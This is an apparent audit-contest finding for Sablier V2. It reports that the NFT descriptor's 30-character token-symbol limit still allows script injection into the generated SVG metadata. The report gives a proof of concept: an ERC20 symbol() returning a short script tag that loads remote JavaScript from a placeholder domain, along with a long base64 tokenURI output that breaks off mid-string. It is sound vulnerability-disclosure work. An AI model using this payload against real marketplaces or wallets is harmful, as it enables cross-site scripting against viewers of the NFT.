Sablier

DeFiFoundry

53,440 USDC

View results

Previous Next

Submission Details

Severity: medium

Valid

Asset symbol length check is not enough to prevent JS injection

ge6a

Summary

In the SablierV2NFTDescriptor contract, a call is made to the respective ERC20 contract to retrieve its symbol. If the length of the symbol is <= 30 characters, the returned value is used; otherwise, the string "Long Symbol" is returned. The comment states that the goal is "to help mitigate potential security threats from malicious assets injecting scripts in the symbol string." The problem is that 30 characters are more than enough to inject malicious JavaScript, and this check does not prevent the described attack. In this report, I will show how this can be exploited by a malicious user.

Vulnerability Details

The tokenURI() function, according to the ERC721 Metadata JSON Schema, returns a JSON object formatted in a specific way. This JSON object is used by various third-party systems to display relevant information about a specific NFT, for example, when it is traded on a marketplace. One of the properties in this JSON object is the image for the respective NFT, which in the case of Sablier, is generated on-chain by the NFTSVG library, with the necessary data provided by the SablierV2NFTDescriptor contract. SVG is an XML-based vector image format for defining two-dimensional graphics; therefore, if a malicious user can control any of the parameters that are passed, they can carry out an XSS attack. One such parameter is the symbol of the ERC contract. A malicious user can create an ERC20 token whose symbol() function returns a string that injects JS (it can be made to return this only when called by the SablierV2NFTDescriptor contract). The only limitation is that the payload used can be a maximum of 30 characters long. This is an example payload that I will use for the proof of concept (POC), but other variants can be used as well.

In it, "aa.aa" should be replaced with an existing domain where the JS code to be executed is hosted. Currently, the payload is 20 characters long, so the domain can be extended by another 10 characters, which is sufficient for a valid domain address. Thus, using a payload <= 30 characters long, arbitrary length JS code can be injected and executed.

As we can see, the payload is not fully valid code, but it is sufficient to be executed by modern browsers in the expected way. The tests were conducted on the latest version of Chrome; for some niche browsers, slight modifications may be necessary, which I will not discuss in detail in this report. To demonstrate that this really works, we will generate an SVG via the contract and then render it in a simple HTML page. To do this, I first modify ERC20Mock by overriding the symbol function to return the aforementioned payload.

function symbol() public view override returns (string memory) {

return "<script src=//aa.aa>";

}

Then I call tokenURI, creating an example test in LockupDynamic.t.sol. I get the following result.

data:application/json;base64,eyJhdHRyaWJ1dGVzIjpbeyJ0cmFpdF90eXBlIjoiQXNzZXQiLCJ2YWx1ZSI6IjxzY3JpcHQgc3JjPS8vYWEuYWE+In0seyJ0cmFpdF90eXBlIjoiU2VuZGVyIiwidmFsdWUiOiIweDdmYTkzODViZTEwMmFjM2VhYzI5NzQ4M2RkNjIzM2Q2MmIzZTE0OTYifSx7InRyYWl0X3R5cGUiOiJTdGF0dXMiLCJ2YWx1ZSI6IlNldHRsZWQifV0sImRlc2NyaXB0aW9uIjoiVGhpcyBORlQgcmVwcmVzZW50cyBhIHBheW1lbnQgc3RyZWFtIGluIGEgU2FibGllciBWMiBMb2NrdXAgRHluYW1pYyBjb250cmFjdC4gVGhlIG93bmVyIG9mIHRoaXMgTkZUIGNhbiB3aXRoZHJhdyB0aGUgc3RyZWFtZWQgYXNzZXRzLCB3aGljaCBhcmUgZGVub21pbmF0ZWQgaW4gPHNjcmlwdCBzcmM9Ly9hYS5hYT4uXG5cbi0gU3RyZWFtIElEOiAxXG4tIExvY2t1cCBEeW5hbWljIEFkZHJlc3M6IDB4NDljMzQ4NmVjOWY0ODgyMzBkZDg1ZmFjMDk4OTI5YWVhOWEzYTg5OFxuLSA8c2NyaXB0IHNyYz0vL2FhLmFhPiBBZGRyZXNzOiAweGY2Mjg0OWY5YTBiNWJmMjkxM2IzOTYwOThmN2M3MDE5YjUxYTgyMGFcblxu4pqg77iPIFdBUk5JTkc6IFRyYW5zZmVycmluZyB0aGUgTkZUIG1ha2VzIHRoZSBuZXcgb3duZXIgdGhlIHJlY2lwaWVudCBvZiB0aGUgc3RyZWFtLiBUaGUgZnVuZHMgYXJlIG5vdCBhdXRvbWF0aWNhbGx5IHdpdGhkcmF3biBmb3IgdGhlIHByZXZpb3VzIHJlY2lwaWVudC4iLCJleHRlcm5hbF91cmwiOiJodHRwczovL3NhYmxpZXIuY29tIiwibmFtZSI6IlNhYmxpZXIgVjIgTG9ja3VwIER5bmFtaWMgIzEiLCJpbWFnZSI6ImRhdGE6aW1hZ2Uvc3ZnK3htbDtiYXNlNjQsUEhOMlp5QjRiV3h1Y3owaWFIUjBjRG92TDNkM2R5NTNNeTV2Y21jdk1qQXdNQzl6ZG1jaUlIZHBaSFJvUFNJeE1EQXdJaUJvWldsbmFIUTlJakV3TURBaUlIWnBaWGRDYjNnOUlqQWdNQ0F4TURBd0lERXdNREFpUGp4eVpXTjBJSGRwWkhSb1BTSXhNREFsSWlCb1pXbG5hSFE5SWpFd01DVWlJR1pwYkhSbGNqMGlkWEpzS0NOT2IybHpaU2tpTHo0OGNtVmpkQ0I0UFNJM01DSWdlVDBpTnpBaUlIZHBaSFJvUFNJNE5qQWlJR2hsYVdkb2REMGlPRFl3SWlCbWFXeHNQU0lqWm1abUlpQm1hV3hzTFc5d1lXTnBkSGs5SWk0d015SWdjbmc5SWpRMUlpQnllVDBpTkRVaUlITjBjbTlyWlQwaUkyWm1aaUlnYzNSeWIydGxMVzl3WVdOcGRIazlJaTR4SWlCemRISnZhMlV0ZDJsa2RHZzlJalFpTHo0OFpHVm1jejQ4WTJseVkyeGxJR2xrUFNKSGJHOTNJaUJ5UFNJMU1EQWlJR1pwYkd3OUluVnliQ2dqVW1Ga2FXRnNSMnh2ZHlraUx6NDhabWxzZEdWeUlHbGtQU0pPYjJselpTSStQR1psUm14dmIyUWdlRDBpTUNJZ2VUMGlNQ0lnZDJsa2RHZzlJakV3TUNVaUlHaGxhV2RvZEQwaU1UQXdKU0lnWm14dmIyUXRZMjlzYjNJOUltaHpiQ2d5TXpBc01qRWxMREV4SlNraUlHWnNiMjlrTFc5d1lXTnBkSGs5SWpFaUlISmxjM1ZzZEQwaVpteHZiMlJHYVd4c0lpOCtQR1psVkhWeVluVnNaVzVqWlNCaVlYTmxSbkpsY1hWbGJtTjVQU0l1TkNJZ2JuVnRUMk4wWVhabGN6MGlNeUlnY21WemRXeDBQU0pPYjJselpTSWdkSGx3WlQwaVpuSmhZM1JoYkU1dmFYTmxJaTgrUEdabFFteGxibVFnYVc0OUlrNXZhWE5sSWlCcGJqSTlJbVpzYjI5a1JtbHNiQ0lnYlc5a1pUMGljMjltZEMxc2FXZG9kQ0l2UGp3dlptbHNkR1Z5UGp4d1lYUm9JR2xrUFNKTWIyZHZJaUJtYVd4c1BTSWpabVptSWlCbWFXeHNMVzl3WVdOcGRIazlJaTR4SWlCa1BTSnRNVE16TGpVMU9Td3hNalF1TURNMFl5MHVNREV6TERJdU5ERXlMVEV1TURVNUxEUXVPRFE0TFRJdU9USXpMRFl1TkRBeUxUSXVOVFU0TERFdU9ERTVMVFV1TVRZNExETXVORE01TFRjdU9EZzRMRFF1T1RrMkxURTBMalEwTERndU1qWXlMVE14TGpBME55d3hNaTQxTmpVdE5EY3VOamMwTERFeUxqVTJPUzA0TGpnMU9DNHdNell0TVRjdU9ETTRMVEV1TWpjeUxUSTJMak15T0MwekxqWTJNeTA1TGpnd05pMHlMamMyTmkweE9TNHdPRGN0Tnk0eE1UTXRNamN1TlRZeUxURXlMamMzT0MweE15NDROREl0T0M0d01qVXNPUzQwTmpndE1qZ3VOakEyTERFMkxqRTFNeTB6TlM0eU5qVm9NR015TGpBek5TMHhMamd6T0N3MExqSTFNaTB6TGpVME5pdzJMalEyTXkwMUxqSXlOR2d3WXpZdU5ESTVMVFV1TmpVMUxERTJMakl4T0MweUxqZ3pOU3d5TUM0ek5UZ3NOQzR4Tnl3MExqRTBNeXcxTGpBMU55dzRMamd4Tml3NUxqWTBPU3d4TXk0NU1pd3hNeTQzTXpSb0xqQXpOMk0xTGpjek5pdzJMalEyTVN3eE5TNHpOVGN0TWk0eU5UTXNPUzR6T0MwNExqUTRMREFzTUMwekxqVXhOUzB6TGpVeE5TMHpMalV4TlMwekxqVXhOUzB4TVM0ME9TMHhNUzQwTnpndE5USXVOalUyTFRVeUxqWTJOQzAyTkM0NE16Y3ROalF1T0RNM2JDNHdORGt0TGpBek4yTXRNUzQzTWpVdE1TNDJNRFl0TWk0M01Ua3RNeTQ0TkRjdE1pNDNOVEV0Tmk0eU1EUm9NR010TGpBME5pMHlMak0zTlN3eExqQTJNaTAwTGpVNE1pd3lMamN5TmkwMkxqSXlPV2d3YkM0eE9EVXRMakUwT0dnd1l5NHdPVGt0TGpBMk1pd3VNakl5TFM0eE5EZ3NMak0zTFM0eU5UbG9NR015TGpBMkxURXVNell5TERNdU9UVXhMVEl1TmpJeExEWXVNRFEwTFRNdU9EUXlRelUzTGpjMk15MHpMalEzTXl3NU55NDNOaTB5TGpNME1Td3hNamd1TmpNM0xERTRMak16TW1NeE5pNDJOekVzT1M0NU5EWXRNall1TXpRMExEVTBMamd4TXkwek9DNDJOVEVzTkRBdU1UazVMVFl1TWprNUxUWXVNRGsyTFRFNExqQTJNeTB4Tnk0M05ETXRNVGt1TmpZNExURTRMamd4TVMwMkxqQXhOaTAwTGpBME55MHhNeTR3TmpFc05DNDNOell0Tnk0M05USXNPUzQzTlRGc05qZ3VNalUwTERZNExqTTNNV014TGpjeU5Dd3hMall3TVN3eUxqY3hOQ3d6TGpnMExESXVOek00TERZdU1Ua3lXaUl2UGp4d1lYUm9JR2xrUFNKR2JHOWhkR2x1WjFSbGVIUWlJR1pwYkd3OUltNXZibVVpSUdROUlrMHhNalVnTkRWb056VXdjemd3SURBZ09EQWdPREIyTnpVd2N6QWdPREFnTFRnd0lEZ3dhQzAzTlRCekxUZ3dJREFnTFRnd0lDMDRNSFl0TnpVd2N6QWdMVGd3SURnd0lDMDRNQ0l2UGp4eVlXUnBZV3hIY21Ga2FXVnVkQ0JwWkQwaVVtRmthV0ZzUjJ4dmR5SStQSE4wYjNBZ2IyWm1jMlYwUFNJd0pTSWdjM1J2Y0MxamIyeHZjajBpYUhOc0tERTFOaXc0TUNVc056a2xLU0lnYzNSdmNDMXZjR0ZqYVhSNVBTSXVOaUl2UGp4emRHOXdJRzltWm5ObGREMGlNVEF3SlNJZ2MzUnZjQzFqYjJ4dmNqMGlhSE5zS0RJek1Dd3lNU1VzTVRFbEtTSWdjM1J2Y0MxdmNHRmphWFI1UFNJd0lpOCtQQzl5WVdScFlXeEhjbUZrYVdWdWRENDhiR2x1WldGeVIzSmhaR2xsYm5RZ2FXUTlJbE5oYm1SVWIzQWlJSGd4UFNJd0pTSWdlVEU5SWpBbElqNDhjM1J2Y0NCdlptWnpaWFE5SWpBbElpQnpkRzl3TFdOdmJHOXlQU0pvYzJ3b01UVTJMRGd3SlN3M09TVXBJaTgrUEhOMGIzQWdiMlptYzJWMFBTSXhNREFsSWlCemRHOXdMV052Ykc5eVBTSm9jMndvTWpNd0xESXhKU3d4TVNVcElpOCtQQzlzYVc1bFlYSkhjbUZrYVdWdWRENDhiR2x1WldGeVIzSmhaR2xsYm5RZ2FXUTlJbE5oYm1SQ2IzUjBiMjBpSUhneFBTSXhNREFsSWlCNU1UMGlNVEF3SlNJK1BITjBiM0FnYjJabWMyVjBQU0l4TUNVaUlITjBiM0F0WTI5c2IzSTlJbWh6YkNneU16QXNNakVsTERFeEpTa2lMejQ4YzNSdmNDQnZabVp6WlhROUlqRXdNQ1VpSUhOMGIzQXRZMjlzYjNJOUltaHpiQ2d4TlRZc09EQWxMRGM1SlNraUx6NDhZVzVwYldGMFpTQmhkSFJ5YVdKMWRHVk9ZVzFsUFNKNE1TSWdaSFZ5UFNJMmN5SWdjbVZ3WldGMFEyOTFiblE5SW1sdVpHVm1hVzVwZEdVaUlIWmhiSFZsY3owaU16QWxPell3SlRzeE1qQWxPell3SlRzek1DVTdJaTgrUEM5c2FXNWxZWEpIY21Ga2FXVnVkRDQ4YkdsdVpXRnlSM0poWkdsbGJuUWdhV1E5SWtodmRYSm5iR0Z6YzFOMGNtOXJaU0lnWjNKaFpHbGxiblJVY21GdWMyWnZjbTA5SW5KdmRHRjBaU2c1TUNraUlHZHlZV1JwWlc1MFZXNXBkSE05SW5WelpYSlRjR0ZqWlU5dVZYTmxJajQ4YzNSdmNDQnZabVp6WlhROUlqVXdKU0lnYzNSdmNDMWpiMnh2Y2owaWFITnNLREUxTml3NE1DVXNOemtsS1NJdlBqeHpkRzl3SUc5bVpuTmxkRDBpT0RBbElpQnpkRzl3TFdOdmJHOXlQU0pvYzJ3b01qTXdMREl4SlN3eE1TVXBJaTgrUEM5c2FXNWxZWEpIY21Ga2FXVnVkRDQ4WnlCcFpEMGlTRzkxY21kc1lYTnpJajQ4Y0dGMGFDQmtQU0pOSURVd0xETTJNQ0JoSURNd01Dd3pNREFnTUNBeExERWdOakF3TERBZ1lTQXpNREFzTXpBd0lEQWdNU3d4SUMwMk1EQXNNQ0lnWm1sc2JEMGlJMlptWmlJZ1ptbHNiQzF2Y0dGamFYUjVQU0l1TURJaUlITjBjbTlyWlQwaWRYSnNLQ05JYjNWeVoyeGhjM05UZEhKdmEyVXBJaUJ6ZEhKdmEyVXRkMmxrZEdnOUlqUWlMejQ4Y0dGMGFDQmtQU0p0TlRZMkxERTJNUzR5TURGMkxUVXpMamt5TkdNd0xURTVMak00TWkweU1pNDFNVE10TXpjdU5UWXpMVFl6TGpNNU9DMDFNUzR4T1RndE5EQXVOelUyTFRFekxqVTVNaTA1TkM0NU5EWXRNakV1TURjNUxURTFNaTQxT0RjdE1qRXVNRGM1Y3kweE1URXVPRE00TERjdU5EZzNMVEUxTWk0Mk1ESXNNakV1TURjNVl5MDBNQzQ0T1RNc01UTXVOak0yTFRZekxqUXhNeXd6TVM0NE1UWXROak11TkRFekxEVXhMakU1T0hZMU15NDVNalJqTUN3eE55NHhPREVzTVRjdU56QTBMRE16TGpReU55dzFNQzR5TWpNc05EWXVNemswZGpJNE5DNDRNRGxqTFRNeUxqVXhPU3d4TWk0NU5pMDFNQzR5TWpNc01qa3VNakEyTFRVd0xqSXlNeXcwTmk0ek9UUjJOVE11T1RJMFl6QXNNVGt1TXpneUxESXlMalV5TERNM0xqVTJNeXcyTXk0ME1UTXNOVEV1TVRrNExEUXdMamMyTXl3eE15NDFPVElzT1RRdU9UVTBMREl4TGpBM09Td3hOVEl1TmpBeUxESXhMakEzT1hNeE1URXVPRE14TFRjdU5EZzNMREUxTWk0MU9EY3RNakV1TURjNVl6UXdMamc0TmkweE15NDJNellzTmpNdU16azRMVE14TGpneE5pdzJNeTR6T1RndE5URXVNVGs0ZGkwMU15NDVNalJqTUMweE55NHhPVFl0TVRjdU56QTBMVE16TGpRek5TMDFNQzR5TWpNdE5EWXVOREF4VmpJd055NDJNRE5qTXpJdU5URTVMVEV5TGprMk55dzFNQzR5TWpNdE1qa3VNakEyTERVd0xqSXlNeTAwTmk0ME1ERmFiUzB6TkRjdU5EWXlMRFUzTGpjNU0yd3hNekF1T1RVNUxERXpNUzR3TWpjdE1UTXdMamsxT1N3eE16RXVNREV6VmpJeE9DNDVPVFJhYlRJMk1pNDVNalF1TURJeWRqSTJNaTR3TVRoc0xURXpNQzQ1TXpjdE1UTXhMakF3Tml3eE16QXVPVE0zTFRFek1TNHdNVE5hSWlCbWFXeHNQU0lqTVRZeE9ESXlJajQ4TDNCaGRHZytQSEJoZEdnZ1pEMGliVFE0TVM0ME5pdzBPREV1TlRSMk9ERXVNREZqTFRJdU16VXVOemN0TkM0NE1pd3hMalV4TFRjdU16a3NNaTR5TXkwek1DNHpMRGd1TlRRdE56UXVOalVzTVRNdU9USXRNVEkwTGpBMkxERXpMamt5TFRVekxqWXNNQzB4TURFdU1qUXROaTR6TXkweE16RXVORGN0TVRZdU1UWjJMVGd4YkRRMkxqTXRORFl1TXpGb01UY3dMak16YkRRMkxqSTVMRFEyTGpNeFdpSWdabWxzYkQwaWRYSnNLQ05UWVc1a1FtOTBkRzl0S1NJdlBqeHdZWFJvSUdROUltMDBNelV1TVRjc05ETTFMakl6WXpBc01TNHhOeTB1TkRZc01pNHpNaTB4TGpNekxETXVORFF0Tnk0eE1TdzVMakE0TFRReExqa3pMREUxTGprNExUZ3pMamd4TERFMUxqazRjeTAzTmk0M0xUWXVPUzA0TXk0NE1pMHhOUzQ1T0dNdExqZzNMVEV1TVRJdE1TNHpNeTB5TGpJM0xURXVNek10TXk0ME5IWXRMakEwYkRndU16UXRPQzR6TlM0d01TMHVNREZqTVRNdU56SXROaTQxTVN3ME1pNDVOUzB4TVM0d01pdzNOaTQ0TFRFeExqQXljell5TGprM0xEUXVORGtzTnpZdU56SXNNVEZzT0M0ME1pdzRMalF5V2lJZ1ptbHNiRDBpZFhKc0tDTlRZVzVrVkc5d0tTSXZQanhuSUdacGJHdzlJbTV2Ym1VaUlITjBjbTlyWlQwaWRYSnNLQ05JYjNWeVoyeGhjM05UZEhKdmEyVXBJaUJ6ZEhKdmEyVXRiR2x1WldOaGNEMGljbTkxYm1RaUlITjBjbTlyWlMxdGFYUmxjbXhwYldsMFBTSXhNQ0lnYzNSeWIydGxMWGRwWkhSb1BTSTBJajQ4Y0dGMGFDQmtQU0p0TlRZMUxqWTBNU3d4TURjdU1qaGpNQ3c1TGpVek55MDFMalUyTERFNExqWXlPUzB4TlM0Mk56WXNNall1T1RjemFDMHVNREl6WXkwNUxqSXdOQ3czTGpVNU5pMHlNaTR4T1RRc01UUXVOVFl5TFRNNExqRTVOeXd5TUM0MU9USXRNemt1TlRBMExERTBMamt6TmkwNU55NHpNalVzTWpRdU16VTFMVEUyTVM0M016TXNNalF1TXpVMUxUa3dMalE0TERBdE1UWTNMamswT0MweE9DNDFPREl0TVRrNUxqazFNeTAwTkM0NU5EaG9MUzR3TWpOakxURXdMakV4TlMwNExqTTBOQzB4TlM0Mk56WXRNVGN1TkRNM0xURTFMalkzTmkweU5pNDVOek1zTUMwek9TNDNNelVzT1RZdU5UVTBMVGN4TGpreU1Td3lNVFV1TmpVeUxUY3hMamt5TVhNeU1UVXVOakk1TERNeUxqRTROU3d5TVRVdU5qSTVMRGN4TGpreU1Wb2lMejQ4Y0dGMGFDQmtQU0p0TVRNMExqTTJMREUyTVM0eU1ETmpNQ3d6T1M0M016VXNPVFl1TlRVMExEY3hMamt5TVN3eU1UVXVOalV5TERjeExqa3lNWE15TVRVdU5qSTVMVE15TGpFNE5pd3lNVFV1TmpJNUxUY3hMamt5TVNJdlBqeHNhVzVsSUhneFBTSXhNelF1TXpZaUlIa3hQU0l4TmpFdU1qQXpJaUI0TWowaU1UTTBMak0ySWlCNU1qMGlNVEEzTGpJNElpOCtQR3hwYm1VZ2VERTlJalUyTlM0Mk5DSWdlVEU5SWpFMk1TNHlNRE1pSUhneVBTSTFOalV1TmpRaUlIa3lQU0l4TURjdU1qZ2lMejQ4YkdsdVpTQjRNVDBpTVRnMExqVTROQ0lnZVRFOUlqSXdOaTQ0TWpNaUlIZ3lQU0l4T0RRdU5UZzFJaUI1TWowaU5UTTNMalUzT1NJdlBqeHNhVzVsSUhneFBTSXlNVGd1TVRneElpQjVNVDBpTWpFNExqRXhPQ0lnZURJOUlqSXhPQzR4T0RFaUlIa3lQU0kxTmpJdU5UTTNJaTgrUEd4cGJtVWdlREU5SWpRNE1TNDRNVGdpSUhreFBTSXlNVGd1TVRReUlpQjRNajBpTkRneExqZ3hPU0lnZVRJOUlqVTJNaTQwTWpnaUx6NDhiR2x1WlNCNE1UMGlOVEUxTGpReE5TSWdlVEU5SWpJd055NHpOVElpSUhneVBTSTFNVFV1TkRFMklpQjVNajBpTlRNM0xqVTNPU0l2UGp4d1lYUm9JR1E5SW0weE9EUXVOVGdzTlRNM0xqVTRZekFzTlM0ME5TdzBMakkzTERFd0xqWTFMREV5TGpBekxERTFMalF5YUM0d01tTTFMalV4TERNdU16a3NNVEl1Tnprc05pNDFOU3d5TVM0MU5TdzVMalF5TERNd0xqSXhMRGt1T1N3M09DNHdNaXd4Tmk0eU9Dd3hNekV1T0RNc01UWXVNamdzTkRrdU5ERXNNQ3c1TXk0M05pMDFMak00TERFeU5DNHdOaTB4TXk0NU1pd3lMamN0TGpjMkxEVXVNamt0TVM0MU5DdzNMamMxTFRJdU16VXNPQzQzTnkweUxqZzNMREUyTGpBMUxUWXVNRFFzTWpFdU5UWXRPUzQwTTJnd1l6Y3VOell0TkM0M055d3hNaTR3TkMwNUxqazNMREV5TGpBMExURTFMalF5SWk4K1BIQmhkR2dnWkQwaWJURTROQzQxT0RJc05Ea3lMalkxTm1NdE16RXVNelUwTERFeUxqUTROUzAxTUM0eU1qTXNNamd1TlRndE5UQXVNakl6TERRMkxqRTBNaXd3TERrdU5UTTJMRFV1TlRZMExERTRMall5Tnl3eE5TNDJOemNzTWpZdU9UWTVhQzR3TWpKak9DNDFNRE1zTnk0d01EVXNNakF1TWpFekxERXpMalEyTXl3ek5DNDFNalFzTVRrdU1UVTVMRGt1T1RrNUxETXVPVGt4TERJeExqSTJPU3czTGpZd09Td3pNeTQxT1Rjc01UQXVOemc0TERNMkxqUTFMRGt1TkRBM0xEZ3lMakU0TVN3eE5TNHdNRElzTVRNeExqZ3pOU3d4TlM0d01ESnpPVFV1TXpZekxUVXVOVGsxTERFek1TNDRNRGN0TVRVdU1EQXlZekV3TGpnME55MHlMamM1TERJd0xqZzJOeTAxTGpreU5pd3lPUzQ1TWpRdE9TNHpORGtzTVM0eU5EUXRMalEyTnl3eUxqUTNNeTB1T1RReUxETXVOamN6TFRFdU5ESTBMREUwTGpNeU5pMDFMalk1Tml3eU5pNHdNelV0TVRJdU1UWXhMRE0wTGpVeU5DMHhPUzR4TnpOb0xqQXlNbU14TUM0eE1UUXRPQzR6TkRJc01UVXVOamMzTFRFM0xqUXpNeXd4TlM0Mk56Y3RNall1T1RZNUxEQXRNVGN1TlRZeUxURTRMamcyT1Mwek15NDJOalV0TlRBdU1qSXpMVFEyTGpFMUlpOCtQSEJoZEdnZ1pEMGliVEV6TkM0ek5pdzFPVEl1TnpKak1Dd3pPUzQzTXpVc09UWXVOVFUwTERjeExqa3lNU3d5TVRVdU5qVXlMRGN4TGpreU1YTXlNVFV1TmpJNUxUTXlMakU0Tml3eU1UVXVOakk1TFRjeExqa3lNU0l2UGp4c2FXNWxJSGd4UFNJeE16UXVNellpSUhreFBTSTFPVEl1TnpJaUlIZ3lQU0l4TXpRdU16WWlJSGt5UFNJMU16Z3VOemszSWk4K1BHeHBibVVnZURFOUlqVTJOUzQyTkNJZ2VURTlJalU1TWk0M01pSWdlREk5SWpVMk5TNDJOQ0lnZVRJOUlqVXpPQzQzT1RjaUx6NDhjRzlzZVd4cGJtVWdjRzlwYm5SelBTSTBPREV1T0RJeUlEUTRNUzQ1TURFZ05EZ3hMamM1T0NBME9ERXVPRGMzSURRNE1TNDNOelVnTkRneExqZzFOQ0F6TlRBdU1ERTFJRE0xTUM0d01qWWdNakU0TGpFNE5TQXlNVGd1TVRJNUlpOCtQSEJ2Ykhsc2FXNWxJSEJ2YVc1MGN6MGlNakU0TGpFNE5TQTBPREV1T1RBeElESXhPQzR5TXpFZ05EZ3hMamcxTkNBek5UQXVNREUxSURNMU1DNHdNallnTkRneExqZ3lNaUF5TVRndU1UVXlJaTgrUEM5blBqd3ZaejQ4WnlCcFpEMGlVSEp2WjNKbGMzTWlJR1pwYkd3OUlpTm1abVlpUGp4eVpXTjBJSGRwWkhSb1BTSXlNRGdpSUdobGFXZG9kRDBpTVRBd0lpQm1hV3hzTFc5d1lXTnBkSGs5SWk0d015SWdjbmc5SWpFMUlpQnllVDBpTVRVaUlITjBjbTlyWlQwaUkyWm1aaUlnYzNSeWIydGxMVzl3WVdOcGRIazlJaTR4SWlCemRISnZhMlV0ZDJsa2RHZzlJalFpTHo0OGRHVjRkQ0I0UFNJeU1DSWdlVDBpTXpRaUlHWnZiblF0Wm1GdGFXeDVQU0luUTI5MWNtbGxjaUJPWlhjbkxFRnlhV0ZzTEcxdmJtOXpjR0ZqWlNJZ1ptOXVkQzF6YVhwbFBTSXlNbkI0SWo1UWNtOW5jbVZ6Y3p3dmRHVjRkRDQ4ZEdWNGRDQjRQU0l5TUNJZ2VUMGlOeklpSUdadmJuUXRabUZ0YVd4NVBTSW5RMjkxY21sbGNpQk9aWGNuTEVGeWFXRnNMRzF2Ym05emNHRmpaU0lnWm05dWRDMXphWHBsUFNJeU5uQjRJajR4TURBbFBDOTBaWGgwUGp4bklHWnBiR3c5SW01dmJtVWlQanhqYVhKamJHVWdZM2c5SWpFMk5pSWdZM2s5SWpVd0lpQnlQU0l5TWlJZ2MzUnliMnRsUFNKb2Myd29Nak13TERJeEpTd3hNU1VwSWlCemRISnZhMlV0ZDJsa2RHZzlJakV3SWk4K1BHTnBjbU5zWlNCamVEMGlNVFkySWlCamVUMGlOVEFpSUhCaGRHaE1aVzVuZEdnOUlqRXdNREF3SWlCeVBTSXlNaUlnYzNSeWIydGxQU0pvYzJ3b01UVTJMRGd3SlN3M09TVXBJaUJ6ZEhKdmEyVXRaR0Z6YUdGeWNtRjVQU0l4TURBd01DSWdjM1J5YjJ0bExXUmhjMmh2Wm1aelpYUTlJakFpSUhOMGNtOXJaUzFzYVc1bFkyRndQU0p5YjNWdVpDSWdjM1J5YjJ0bExYZHBaSFJvUFNJMUlpQjBjbUZ1YzJadmNtMDlJbkp2ZEdGMFpTZ3RPVEFwSWlCMGNtRnVjMlp2Y20wdGIzSnBaMmx1UFNJeE5qWWdOVEFpTHo0OEwyYytQQzluUGp4bklHbGtQU0pUZEdGMGRYTWlJR1pwYkd3OUlpTm1abVlpUGp4eVpXTjBJSGRwWkhSb1BTSXhOVElpSUdobGFXZG9kRDBpTVRBd0lpQm1hV3hzTFc5d1lXTnBkSGs5SWk0d015SWdjbmc5SWpFMUlpQnllVDBpTVRVaUlITjBjbTlyWlQwaUkyWm1aaUlnYzNSeWIydGxMVzl3WVdOcGRIazlJaTR4SWlCemRISnZhMlV0ZDJsa2RHZzlJalFpTHo0OGRHVjRkQ0I0UFNJeU1DSWdlVDBpTXpRaUlHWnZiblF0Wm1GdGFXeDVQU0luUTI5MWNtbGxjaUJPWlhjbkxFRnlhV0ZzTEcxdmJtOXpjR0ZqWlNJZ1ptOXVkQzF6YVhwbFBTSXlNbkI0SWo1VGRHRjBkWE04TDNSbGVIUStQSFJsZUhRZ2VEMGlNakFpSUhrOUlqY3lJaUJtYjI1MExXWmhiV2xzZVQwaUowTnZkWEpwWlhJZ1RtVjNKeXhCY21saGJDeHRiMjV2YzNCaFkyVWlJR1p2Ym5RdGMybDZaVDBpTWpad2VDSStVMlYwZEd4bFpEd3ZkR1Y0ZEQ0OEwyYytQR2NnYVdROUlrRnRiM1Z1ZENJZ1ptbHNiRDBpSTJabVppSStQSEpsWTNRZ2QybGtkR2c5SWpFeE9DSWdhR1ZwWjJoMFBTSXhNREFpSUdacGJHd3RiM0JoWTJsMGVUMGlMakF6SWlCeWVEMGlNVFVpSUhKNVBTSXhOU0lnYzNSeWIydGxQU0lqWm1abUlpQnpkSEp2YTJVdGIzQmhZMmwwZVQwaUxqRWlJSE4wY205clpTMTNhV1IwYUQwaU5DSXZQangwWlhoMElIZzlJakl3SWlCNVBTSXpOQ0lnWm05dWRDMW1ZVzFwYkhrOUlpZERiM1Z5YVdWeUlFNWxkeWNzUVhKcFlXd3NiVzl1YjNOd1lXTmxJaUJtYjI1MExYTnBlbVU5SWpJeWNIZ2lQa0Z0YjNWdWREd3ZkR1Y0ZEQ0OGRHVjRkQ0I0UFNJeU1DSWdlVDBpTnpJaUlHWnZiblF0Wm1GdGFXeDVQU0luUTI5MWNtbGxjaUJPWlhjbkxFRnlhV0ZzTEcxdmJtOXpjR0ZqWlNJZ1ptOXVkQzF6YVhwbFBTSXlObkI0SWo0bUl6ZzRNRFU3SURGTFBDOTBaWGgwUGp3dlp6NDhaeUJwWkQwaVJIVnlZWFJwYjI0aUlHWnBiR3c5SWlObVptWWlQanh5WldOMElIZHBaSFJvUFNJeE5USWlJR2hsYVdkb2REMGlNVEF3SWlCbWFXeHNMVzl3WVdOcGRIazlJaTR3TXlJZ2NuZzlJakUxSWlCeWVUMGlNVFVpSUhOMGNtOXJaVDBpSTJabVppSWdjM1J5YjJ0bExXOXdZV05wZEhrOUlpNHhJaUJ6ZEhKdmEyVXRkMmxrZEdnOUlqUWlMejQ4ZEdWNGRDQjRQU0l5TUNJZ2VUMGlNelFpSUdadmJuUXRabUZ0YVd4NVBTSW5RMjkxY21sbGNpQk9aWGNuTEVGeWFXRnNMRzF2Ym05emNHRmpaU0lnWm05dWRDMXphWHBsUFNJeU1uQjRJajVFZFhKaGRHbHZiand2ZEdWNGRENDhkR1Y0ZENCNFBTSXlNQ0lnZVQwaU56SWlJR1p2Ym5RdFptRnRhV3g1UFNJblEyOTFjbWxsY2lCT1pYY25MRUZ5YVdGc0xHMXZibTl6Y0dGalpTSWdabTl1ZEMxemFYcGxQU0l5Tm5CNElqNHhNQ0JFWVhselBDOTBaWGgwUGp3dlp6NDhMMlJsWm5NK1BIUmxlSFFnZEdWNGRDMXlaVzVrWlhKcGJtYzlJbTl3ZEdsdGFYcGxVM0JsWldRaVBqeDBaWGgwVUdGMGFDQnpkR0Z5ZEU5bVpuTmxkRDBpTFRFd01DVWlJR2h5WldZOUlpTkdiRzloZEdsdVoxUmxlSFFpSUdacGJHdzlJaU5tWm1ZaUlHWnZiblF0Wm1GdGFXeDVQU0luUTI5MWNtbGxjaUJPWlhjbkxFRnlhV0ZzTEcxdmJtOXpjR0ZqWlNJZ1ptbHNiQzF2Y0dGamFYUjVQU0l1T0NJZ1ptOXVkQzF6YVhwbFBTSXlObkI0SWo0OFlXNXBiV0YwWlNCaFpHUnBkR2wyWlQwaWMzVnRJaUJoZEhSeWFXSjFkR1ZPWVcxbFBTSnpkR0Z5ZEU5bVpuTmxkQ0lnWW1WbmFXNDlJakJ6SWlCa2RYSTlJalV3Y3lJZ1puSnZiVDBpTUNVaUlISmxjR1ZoZEVOdmRX